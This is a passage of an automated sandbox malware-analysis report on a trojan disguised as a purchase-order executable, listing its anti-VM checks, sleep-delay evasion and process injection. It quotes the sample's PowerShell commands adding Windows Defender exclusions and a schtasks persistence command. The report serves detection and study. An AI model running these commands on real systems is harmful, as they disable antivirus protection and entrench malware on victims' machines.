                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 7F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 7760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 8760000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 9920000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 9CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: ACA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: BCA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: CFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: DFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: EFE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: F6D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 7AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 8AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 8C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 9C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 8C50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: 9FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeMemory allocated: AFA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeWindow / User API: threadDelayed 1462Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeWindow / User API: threadDelayed 2203Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4151Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7886Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3420Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeWindow / User API: threadDelayed 1221Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeWindow / User API: threadDelayed 4208Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1048
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8815
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1216
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1256
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 938
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1020
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 885
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe TID: 7748Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 4151 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 231 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe TID: 2128Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe TID: 3384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1216 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1256 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 938 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1020 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 885 > 30
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99775Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99412Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99241Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98959Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98463Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98353Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97917Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97695Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98451
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96803
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94531
                    Source: RegSvcs.exe, 0000000D.00000002.4115225187.0000000005A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                    Source: jDCErdK.exe, 00000009.00000002.1780273695.00000000012B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: RegSvcs.exe, 00000008.00000002.1787426495.0000000006370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Users\user\Desktop\purchase order - PO-011024-201.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
